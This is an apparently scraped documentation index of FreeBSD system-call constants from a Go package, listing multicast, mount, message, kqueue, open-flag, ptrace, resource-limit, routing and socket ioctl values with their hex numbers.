MCAST_BLOCK_SOURCE (line 1073) | MCAST_BLOCK_SOURCE = 0x54 constant MCAST_EXCLUDE (line 1074) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 1075) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 1076) | MCAST_JOIN_GROUP = 0x50 constant MCAST_JOIN_SOURCE_GROUP (line 1077) | MCAST_JOIN_SOURCE_GROUP = 0x52 constant MCAST_LEAVE_GROUP (line 1078) | MCAST_LEAVE_GROUP = 0x51 constant MCAST_LEAVE_SOURCE_GROUP (line 1079) | MCAST_LEAVE_SOURCE_GROUP = 0x53 constant MCAST_UNBLOCK_SOURCE (line 1080) | MCAST_UNBLOCK_SOURCE = 0x55 constant MCAST_UNDEFINED (line 1081) | MCAST_UNDEFINED = 0x0 constant MCL_CURRENT (line 1082) | MCL_CURRENT = 0x1 constant MCL_FUTURE (line 1083) | MCL_FUTURE = 0x2 constant MFD_ALLOW_SEALING (line 1084) | MFD_ALLOW_SEALING = 0x2 constant MFD_CLOEXEC (line 1085) | MFD_CLOEXEC = 0x1 constant MFD_HUGETLB (line 1086) | MFD_HUGETLB = 0x4 constant MFD_HUGE_16GB (line 1087) | MFD_HUGE_16GB = -0x78000000 constant MFD_HUGE_16MB (line 1088) | MFD_HUGE_16MB = 0x60000000 constant MFD_HUGE_1GB (line 1089) | MFD_HUGE_1GB = 0x78000000 constant MFD_HUGE_1MB (line 1090) | MFD_HUGE_1MB = 0x50000000 constant MFD_HUGE_256MB (line 1091) | MFD_HUGE_256MB = 0x70000000 constant MFD_HUGE_2GB (line 1092) | MFD_HUGE_2GB = 0x7c000000 constant MFD_HUGE_2MB (line 1093) | MFD_HUGE_2MB = 0x54000000 constant MFD_HUGE_32MB (line 1094) | MFD_HUGE_32MB = 0x64000000 constant MFD_HUGE_512KB (line 1095) | MFD_HUGE_512KB = 0x4c000000 constant MFD_HUGE_512MB (line 1096) | MFD_HUGE_512MB = 0x74000000 constant MFD_HUGE_64KB (line 1097) | MFD_HUGE_64KB = 0x40000000 constant MFD_HUGE_8MB (line 1098) | MFD_HUGE_8MB = 0x5c000000 constant MFD_HUGE_MASK (line 1099) | MFD_HUGE_MASK = 0xfc000000 constant MFD_HUGE_SHIFT (line 1100) | MFD_HUGE_SHIFT = 0x1a constant MNT_ACLS (line 1101) | MNT_ACLS = 0x8000000 constant MNT_ASYNC (line 1102) | MNT_ASYNC = 0x40 constant MNT_AUTOMOUNTED (line 1103) | MNT_AUTOMOUNTED = 0x200000000 constant MNT_BYFSID (line 1104) | MNT_BYFSID = 0x8000000 constant MNT_CMDFLAGS (line 1105) | MNT_CMDFLAGS = 0x300d0f0000 constant MNT_DEFEXPORTED (line 1106) | MNT_DEFEXPORTED = 0x200 constant MNT_DELEXPORT (line 1107) | MNT_DELEXPORT = 0x20000 constant MNT_EMPTYDIR (line 1108) | MNT_EMPTYDIR = 0x2000000000 constant MNT_EXKERB (line 1109) | MNT_EXKERB = 0x800 constant MNT_EXPORTANON (line 1110) | MNT_EXPORTANON = 0x400 constant MNT_EXPORTED (line 1111) | MNT_EXPORTED = 0x100 constant MNT_EXPUBLIC (line 1112) | MNT_EXPUBLIC = 0x20000000 constant MNT_EXRDONLY (line 1113) | MNT_EXRDONLY = 0x80 constant MNT_EXTLS (line 1114) | MNT_EXTLS = 0x4000000000 constant MNT_EXTLSCERT (line 1115) | MNT_EXTLSCERT = 0x8000000000 constant MNT_EXTLSCERTUSER (line 1116) | MNT_EXTLSCERTUSER = 0x10000000000 constant MNT_FORCE (line 1117) | MNT_FORCE = 0x80000 constant MNT_GJOURNAL (line 1118) | MNT_GJOURNAL = 0x2000000 constant MNT_IGNORE (line 1119) | MNT_IGNORE = 0x800000 constant MNT_LAZY (line 1120) | MNT_LAZY = 0x3 constant MNT_LOCAL (line 1121) | MNT_LOCAL = 0x1000 constant MNT_MULTILABEL (line 1122) | MNT_MULTILABEL = 0x4000000 constant MNT_NFS4ACLS (line 1123) | MNT_NFS4ACLS = 0x10 constant MNT_NOATIME (line 1124) | MNT_NOATIME = 0x10000000 constant MNT_NOCLUSTERR (line 1125) | MNT_NOCLUSTERR = 0x40000000 constant MNT_NOCLUSTERW (line 1126) | MNT_NOCLUSTERW = 0x80000000 constant MNT_NOCOVER (line 1127) | MNT_NOCOVER = 0x1000000000 constant MNT_NOEXEC (line 1128) | MNT_NOEXEC = 0x4 constant MNT_NONBUSY (line 1129) | MNT_NONBUSY = 0x4000000 constant MNT_NOSUID (line 1130) | MNT_NOSUID = 0x8 constant MNT_NOSYMFOLLOW (line 1131) | MNT_NOSYMFOLLOW = 0x400000 constant MNT_NOWAIT (line 1132) | MNT_NOWAIT = 0x2 constant MNT_QUOTA (line 1133) | MNT_QUOTA = 0x2000 constant MNT_RDONLY (line 1134) | MNT_RDONLY = 0x1 constant MNT_RELOAD (line 1135) | MNT_RELOAD = 0x40000 constant MNT_ROOTFS (line 1136) | MNT_ROOTFS = 0x4000 constant MNT_SNAPSHOT (line 1137) | MNT_SNAPSHOT = 0x1000000 constant MNT_SOFTDEP (line 1138) | MNT_SOFTDEP = 0x200000 constant MNT_SUIDDIR (line 1139) | MNT_SUIDDIR = 0x100000 constant MNT_SUJ (line 1140) | MNT_SUJ = 0x100000000 constant MNT_SUSPEND (line 1141) | MNT_SUSPEND = 0x4 constant MNT_SYNCHRONOUS (line 1142) | MNT_SYNCHRONOUS = 0x2 constant MNT_UNION (line 1143) | MNT_UNION = 0x20 constant MNT_UNTRUSTED (line 1144) | MNT_UNTRUSTED = 0x800000000 constant MNT_UPDATE (line 1145) | MNT_UPDATE = 0x10000 constant MNT_UPDATEMASK (line 1146) | MNT_UPDATEMASK = 0xad8d0807e constant MNT_USER (line 1147) | MNT_USER = 0x8000 constant MNT_VERIFIED (line 1148) | MNT_VERIFIED = 0x400000000 constant MNT_VISFLAGMASK (line 1149) | MNT_VISFLAGMASK = 0xffef0ffff constant MNT_WAIT (line 1150) | MNT_WAIT = 0x1 constant MSG_CMSG_CLOEXEC (line 1151) | MSG_CMSG_CLOEXEC = 0x40000 constant MSG_COMPAT (line 1152) | MSG_COMPAT = 0x8000 constant MSG_CTRUNC (line 1153) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1154) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1155) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1156) | MSG_EOF = 0x100 constant MSG_EOR (line 1157) | MSG_EOR = 0x8 constant MSG_NBIO (line 1158) | MSG_NBIO = 0x4000 constant MSG_NOSIGNAL (line 1159) | MSG_NOSIGNAL = 0x20000 constant MSG_NOTIFICATION (line 1160) | MSG_NOTIFICATION = 0x2000 constant MSG_OOB (line 1161) | MSG_OOB = 0x1 constant MSG_PEEK (line 1162) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1163) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1164) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1165) | MSG_WAITFORONE = 0x80000 constant MS_ASYNC (line 1166) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1167) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1168) | MS_SYNC = 0x0 constant NAME_MAX (line 1169) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1170) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1171) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1172) | NET_RT_IFLIST = 0x3 constant NET_RT_IFLISTL (line 1173) | NET_RT_IFLISTL = 0x5 constant NET_RT_IFMALIST (line 1174) | NET_RT_IFMALIST = 0x4 constant NET_RT_NHGRP (line 1175) | NET_RT_NHGRP = 0x7 constant NET_RT_NHOP (line 1176) | NET_RT_NHOP = 0x6 constant NFDBITS (line 1177) | NFDBITS = 0x40 constant NOFLSH (line 1178) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1179) | NOKERNINFO = 0x2000000 constant NOTE_ABSTIME (line 1180) | NOTE_ABSTIME = 0x10 constant NOTE_ATTRIB (line 1181) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1182) | NOTE_CHILD = 0x4 constant NOTE_CLOSE (line 1183) | NOTE_CLOSE = 0x100 constant NOTE_CLOSE_WRITE (line 1184) | NOTE_CLOSE_WRITE = 0x200 constant NOTE_DELETE (line 1185) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1186) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1187) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1188) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1189) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1190) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1191) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1192) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1193) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1194) | NOTE_FFOR = 0x80000000 constant NOTE_FILE_POLL (line 1195) | NOTE_FILE_POLL = 0x2 constant NOTE_FORK (line 1196) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1197) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1198) | NOTE_LOWAT = 0x1 constant NOTE_MSECONDS (line 1199) | NOTE_MSECONDS = 0x2 constant NOTE_NSECONDS (line 1200) | NOTE_NSECONDS = 0x8 constant NOTE_OPEN (line 1201) | NOTE_OPEN = 0x80 constant NOTE_PCTRLMASK (line 1202) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1203) | NOTE_PDATAMASK = 0xfffff constant NOTE_READ (line 1204) | NOTE_READ = 0x400 constant NOTE_RENAME (line 1205) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1206) | NOTE_REVOKE = 0x40 constant NOTE_SECONDS (line 1207) | NOTE_SECONDS = 0x1 constant NOTE_TRACK (line 1208) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1209) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1210) | NOTE_TRIGGER = 0x1000000 constant NOTE_USECONDS (line 1211) | NOTE_USECONDS = 0x4 constant NOTE_WRITE (line 1212) | NOTE_WRITE = 0x2 constant OCRNL (line 1213) | OCRNL = 0x10 constant ONLCR (line 1214) | ONLCR = 0x2 constant ONLRET (line 1215) | ONLRET = 0x40 constant ONOCR (line 1216) | ONOCR = 0x20 constant ONOEOT (line 1217) | ONOEOT = 0x8 constant OPOST (line 1218) | OPOST = 0x1 constant OXTABS (line 1219) | OXTABS = 0x4 constant O_ACCMODE (line 1220) | O_ACCMODE = 0x3 constant O_APPEND (line 1221) | O_APPEND = 0x8 constant O_ASYNC (line 1222) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1223) | O_CLOEXEC = 0x100000 constant O_CREAT (line 1224) | O_CREAT = 0x200 constant O_DIRECT (line 1225) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 1226) | O_DIRECTORY = 0x20000 constant O_DSYNC (line 1227) | O_DSYNC = 0x1000000 constant O_EMPTY_PATH (line 1228) | O_EMPTY_PATH = 0x2000000 constant O_EXCL (line 1229) | O_EXCL = 0x800 constant O_EXEC (line 1230) | O_EXEC = 0x40000 constant O_EXLOCK (line 1231) | O_EXLOCK = 0x20 constant O_FSYNC (line 1232) | O_FSYNC = 0x80 constant O_NDELAY (line 1233) | O_NDELAY = 0x4 constant O_NOCTTY (line 1234) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1235) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1236) | O_NONBLOCK = 0x4 constant O_PATH (line 1237) | O_PATH = 0x400000 constant O_RDONLY (line 1238) | O_RDONLY = 0x0 constant O_RDWR (line 1239) | O_RDWR = 0x2 constant O_RESOLVE_BENEATH (line 1240) | O_RESOLVE_BENEATH = 0x800000 constant O_SEARCH (line 1241) | O_SEARCH = 0x40000 constant O_SHLOCK (line 1242) | O_SHLOCK = 0x10 constant O_SYNC (line 1243) | O_SYNC = 0x80 constant O_TRUNC (line 1244) | O_TRUNC = 0x400 constant O_TTY_INIT (line 1245) | O_TTY_INIT = 0x80000 constant O_VERIFY (line 1246) | O_VERIFY = 0x200000 constant O_WRONLY (line 1247) | O_WRONLY = 0x1 constant PARENB (line 1248) | PARENB = 0x1000 constant PARMRK (line 1249) | PARMRK = 0x8 constant PARODD (line 1250) | PARODD = 0x2000 constant PENDIN (line 1251) | PENDIN = 0x20000000 constant PIOD_READ_D (line 1252) | PIOD_READ_D = 0x1 constant PIOD_READ_I (line 1253) | PIOD_READ_I = 0x3 constant PIOD_WRITE_D (line 1254) | PIOD_WRITE_D = 0x2 constant PIOD_WRITE_I (line 1255) | PIOD_WRITE_I = 0x4 constant PRIO_PGRP (line 1256) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1257) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1258) | PRIO_USER = 0x2 constant PROT_EXEC (line 1259) | PROT_EXEC = 0x4 constant PROT_NONE (line 1260) | PROT_NONE = 0x0 constant PROT_READ (line 1261) | PROT_READ = 0x1 constant PROT_WRITE (line 1262) | PROT_WRITE = 0x2 constant PTRACE_DEFAULT (line 1263) | PTRACE_DEFAULT = 0x1 constant PTRACE_EXEC (line 1264) | PTRACE_EXEC = 0x1 constant PTRACE_FORK (line 1265) | PTRACE_FORK = 0x8 constant PTRACE_LWP (line 1266) | PTRACE_LWP = 0x10 constant PTRACE_SCE (line 1267) | PTRACE_SCE = 0x2 constant PTRACE_SCX (line 1268) | PTRACE_SCX = 0x4 constant PTRACE_SYSCALL (line 1269) | PTRACE_SYSCALL = 0x6 constant PTRACE_VFORK (line 1270) | PTRACE_VFORK = 0x20 constant PT_ATTACH (line 1271) | PT_ATTACH = 0xa constant PT_CLEARSTEP (line 1272) | PT_CLEARSTEP = 0x10 constant PT_CONTINUE (line 1273) | PT_CONTINUE = 0x7 constant PT_COREDUMP (line 1274) | PT_COREDUMP = 0x1d constant PT_DETACH (line 1275) | PT_DETACH = 0xb constant PT_FIRSTMACH (line 1276) | PT_FIRSTMACH = 0x40 constant PT_FOLLOW_FORK (line 1277) | PT_FOLLOW_FORK = 0x17 constant PT_GETDBREGS (line 1278) | PT_GETDBREGS = 0x25 constant PT_GETFPREGS (line 1279) | PT_GETFPREGS = 0x23 constant PT_GETLWPLIST (line 1280) | PT_GETLWPLIST = 0xf constant PT_GETNUMLWPS (line 1281) | PT_GETNUMLWPS = 0xe constant PT_GETREGS (line 1282) | PT_GETREGS = 0x21 constant PT_GET_EVENT_MASK (line 1283) | PT_GET_EVENT_MASK = 0x19 constant PT_GET_SC_ARGS (line 1284) | PT_GET_SC_ARGS = 0x1b constant PT_GET_SC_RET (line 1285) | PT_GET_SC_RET = 0x1c constant PT_IO (line 1286) | PT_IO = 0xc constant PT_KILL (line 1287) | PT_KILL = 0x8 constant PT_LWPINFO (line 1288) | PT_LWPINFO = 0xd constant PT_LWP_EVENTS (line 1289) | PT_LWP_EVENTS = 0x18 constant PT_READ_D (line 1290) | PT_READ_D = 0x2 constant PT_READ_I (line 1291) | PT_READ_I = 0x1 constant PT_RESUME (line 1292) | PT_RESUME = 0x13 constant PT_SETDBREGS (line 1293) | PT_SETDBREGS = 0x26 constant PT_SETFPREGS (line 1294) | PT_SETFPREGS = 0x24 constant PT_SETREGS (line 1295) | PT_SETREGS = 0x22 constant PT_SETSTEP (line 1296) | PT_SETSTEP = 0x11 constant PT_SET_EVENT_MASK (line 1297) | PT_SET_EVENT_MASK = 0x1a constant PT_STEP (line 1298) | PT_STEP = 0x9 constant PT_SUSPEND (line 1299) | PT_SUSPEND = 0x12 constant PT_SYSCALL (line 1300) | PT_SYSCALL = 0x16 constant PT_TO_SCE (line 1301) | PT_TO_SCE = 0x14 constant PT_TO_SCX (line 1302) | PT_TO_SCX = 0x15 constant PT_TRACE_ME (line 1303) | PT_TRACE_ME = 0x0 constant PT_VM_ENTRY (line 1304) | PT_VM_ENTRY = 0x29 constant PT_VM_TIMESTAMP (line 1305) | PT_VM_TIMESTAMP = 0x28 constant PT_WRITE_D (line 1306) | PT_WRITE_D = 0x5 constant PT_WRITE_I (line 1307) | PT_WRITE_I = 0x4 constant P_ZONEID (line 1308) | P_ZONEID = 0xc constant RLIMIT_AS (line 1309) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1310) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1311) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1312) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1313) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1314) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1315) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1316) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1317) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1318) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1319) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1320) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1321) | RTAX_BRD = 0x7 constant RTAX_DST (line 1322) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1323) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1324) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1325) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1326) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1327) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 1328) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1329) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1330) | RTA_BRD = 0x80 constant RTA_DST (line 1331) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1332) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1333) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1334) | RTA_IFA = 0x20 constant RTA_IFP (line 1335) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1336) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1337) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1338) | RTF_BROADCAST = 0x400000 constant RTF_DONE (line 1339) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1340) | RTF_DYNAMIC = 0x10 constant RTF_FIXEDMTU (line 1341) | RTF_FIXEDMTU = 0x80000 constant RTF_FMASK (line 1342) | RTF_FMASK = 0x1004d808 constant RTF_GATEWAY (line 1343) | RTF_GATEWAY = 0x2 constant RTF_GWFLAG_COMPAT (line 1344) | RTF_GWFLAG_COMPAT = 0x80000000 constant RTF_HOST (line 1345) | RTF_HOST = 0x4 constant RTF_LLDATA (line 1346) | RTF_LLDATA = 0x400 constant RTF_LLINFO (line 1347) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1348) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1349) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 1350) | RTF_MULTICAST = 0x800000 constant RTF_PINNED (line 1351) | RTF_PINNED = 0x100000 constant RTF_PROTO1 (line 1352) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1353) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1354) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 1355) | RTF_REJECT = 0x8 constant RTF_STATIC (line 1356) | RTF_STATIC = 0x800 constant RTF_STICKY (line 1357) | RTF_STICKY = 0x10000000 constant RTF_UP (line 1358) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1359) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1360) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1361) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1362) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1363) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1364) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1365) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1366) | RTM_IEEE80211 = 0x12 constant RTM_IFANNOUNCE (line 1367) | RTM_IFANNOUNCE = 0x11 constant RTM_IFINFO (line 1368) | RTM_IFINFO = 0xe constant RTM_LOCK (line 1369) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1370) | RTM_LOSING = 0x5 constant RTM_MISS (line 1371) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1372) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1373) | RTM_NEWMADDR = 0xf constant RTM_REDIRECT (line 1374) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1375) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1376) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1377) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1378) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1379) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1380) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1381) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1382) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1383) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1384) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1385) | RTV_SSTHRESH = 0x20 constant RTV_WEIGHT (line 1386) | RTV_WEIGHT = 0x100 constant RT_ALL_FIBS (line 1387) | RT_ALL_FIBS = -0x1 constant RT_BLACKHOLE (line 1388) | RT_BLACKHOLE = 0x40 constant RT_DEFAULT_FIB (line 1389) | RT_DEFAULT_FIB = 0x0 constant RT_DEFAULT_WEIGHT (line 1390) | RT_DEFAULT_WEIGHT = 0x1 constant RT_HAS_GW (line 1391) | RT_HAS_GW = 0x80 constant RT_HAS_HEADER (line 1392) | RT_HAS_HEADER = 0x10 constant RT_HAS_HEADER_BIT (line 1393) | RT_HAS_HEADER_BIT = 0x4 constant RT_L2_ME (line 1394) | RT_L2_ME = 0x4 constant RT_L2_ME_BIT (line 1395) | RT_L2_ME_BIT = 0x2 constant RT_LLE_CACHE (line 1396) | RT_LLE_CACHE = 0x100 constant RT_MAX_WEIGHT (line 1397) | RT_MAX_WEIGHT = 0xffffff constant RT_MAY_LOOP (line 1398) | RT_MAY_LOOP = 0x8 constant RT_MAY_LOOP_BIT (line 1399) | RT_MAY_LOOP_BIT = 0x3 constant RT_REJECT (line 1400) | RT_REJECT = 0x20 constant RUSAGE_CHILDREN (line 1401) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1402) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1403) | RUSAGE_THREAD = 0x1 constant SCM_BINTIME (line 1404) | SCM_BINTIME = 0x4 constant SCM_CREDS (line 1405) | SCM_CREDS = 0x3 constant SCM_CREDS2 (line 1406) | SCM_CREDS2 = 0x8 constant SCM_MONOTONIC (line 1407) | SCM_MONOTONIC = 0x6 constant SCM_REALTIME (line 1408) | SCM_REALTIME = 0x5 constant SCM_RIGHTS (line 1409) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1410) | SCM_TIMESTAMP = 0x2 constant SCM_TIME_INFO (line 1411) | SCM_TIME_INFO = 0x7 constant SEEK_CUR (line 1412) | SEEK_CUR = 0x1 constant SEEK_DATA (line 1413) | SEEK_DATA = 0x3 constant SEEK_END (line 1414) | SEEK_END = 0x2 constant SEEK_HOLE (line 1415) | SEEK_HOLE = 0x4 constant SEEK_SET (line 1416) | SEEK_SET = 0x0 constant SHUT_RD (line 1417) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1418) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1419) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1420) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1421) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1422) | SIOCAIFGROUP = 0x80286987 constant SIOCATMARK (line 1423) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1424) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1425) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1426) | SIOCDIFGROUP = 0x80286989 constant SIOCDIFPHYADDR (line 1427) | SIOCDIFPHYADDR = 0x80206949 constant SIOCGDRVSPEC (line 1428) | SIOCGDRVSPEC = 0xc028697b constant SIOCGETSGCNT (line 1429) | SIOCGETSGCNT = 0xc0207210 constant SIOCGETVIFCNT (line 1430) | SIOCGETVIFCNT = 0xc028720f constant SIOCGHIWAT (line 1431) | SIOCGHIWAT = 0x40047301 constant SIOCGHWADDR (line 1432) | SIOCGHWADDR = 0xc020693e constant SIOCGI2C (line 1433) | SIOCGI2C = 0xc020693d constant SIOCGIFADDR (line 1434) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALIAS (line 1435) | SIOCGIFALIAS = 0xc044692d constant SIOCGIFBRDADDR (line 1436) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1437) | SIOCGIFCAP = 0xc020691f constant SIOCGIFCONF (line 1438) | SIOCGIFCONF = 0xc0106924 constant SIOCGIFDATA (line 1439) | SIOCGIFDATA = 0x8020692c constant SIOCGIFDESCR (line 1440) | SIOCGIFDESCR = 0xc020692a constant SIOCGIFDOWNREASON (line 1441) | SIOCGIFDOWNREASON = 0xc058699a constant SIOCGIFDSTADDR (line 1442) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFIB (line 1443) | SIOCGIFFIB = 0xc020695c constant SIOCGIFFLAGS (line 1444) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGENERIC (line 1445) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGMEMB (line 1446) | SIOCGIFGMEMB = 0xc028698a constant SIOCGIFGROUP (line 1447) | SIOCGIFGROUP = 0xc0286988 constant SIOCGIFINDEX (line 1448) | SIOCGIFINDEX = 0xc0206920 constant SIOCGIFMAC (line 1449) | SIOCGIFMAC = 0xc0206926 constant SIOCGIFMEDIA (line 1450) | SIOCGIFMEDIA = 0xc0306938 constant SIOCGIFMETRIC (line 1451) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1452) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1453) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1454) | SIOCGIFPDSTADDR = 0xc0206948 constant SIOCGIFPHYS (line 1455) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPSRCADDR (line 1456) | SIOCGIFPSRCADDR = 0xc0206947 constant SIOCGIFRSSHASH (line 1457) | SIOCGIFRSSHASH = 0xc0186997 constant SIOCGIFRSSKEY (line 1458) | SIOCGIFRSSKEY = 0xc0946996 constant SIOCGIFSTATUS (line 1459) | SIOCGIFSTATUS = 0xc331693b constant SIOCGIFXMEDIA (line 1460) | SIOCGIFXMEDIA = 0xc030698b constant SIOCGLANPCP (line 1461) | SIOCGLANPCP = 0xc0206998 constant SIOCGLOWAT (line 1462) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1463) | SIOCGPGRP = 0x40047309 constant SIOCGPRIVATE_0 (line 1464) | SIOCGPRIVATE_0 = 0xc0206950 constant SIOCGPRIVATE_1 (line 1465) | SIOCGPRIVATE_1 = 0xc0206951 constant SIOCGTUNFIB (line 1466) | SIOCGTUNFIB = 0xc020695e constant SIOCIFCREATE (line 1467) | SIOCIFCREATE = 0xc020697a constant SIOCIFCREATE2 (line 1468) | SIOCIFCREATE2 = 0xc020697c constant SIOCIFDESTROY (line 1469) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1470) | SIOCIFGCLONERS = 0xc0106978 constant SIOCSDRVSPEC (line 1471) | SIOCSDRVSPEC = 0x8028697b constant SIOCSHIWAT (line 1472) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1473) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1474) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1475) | SIOCSIFCAP = 0x8020691e constant SIOCSIFDESCR (line 1476) | SIOCSIFDESCR = 0x80206929 constant SIOCSIFDSTADDR (line 1477) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFIB (line 1478) | SIOCSIFFIB = 0x8020695d constant SIOCSIFFLAGS (line 1479) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1480) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1481) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMAC (line 1482) | SIOCSIFMAC = 0x80206927 constant SIOCSIFMEDIA (line 1483) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1484) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1485) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNAME (line 1486) | SIOCSIFNAME = 0x80206928 constant SIOCSIFNETMASK (line 1487) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1488) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSIFPHYS (line 1489) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFRVNET (line 1490) | SIOCSIFRVNET = 0xc020695b constant SIOCSIFVNET (line 1491) | SIOCSIFVNET = 0xc020695a constant 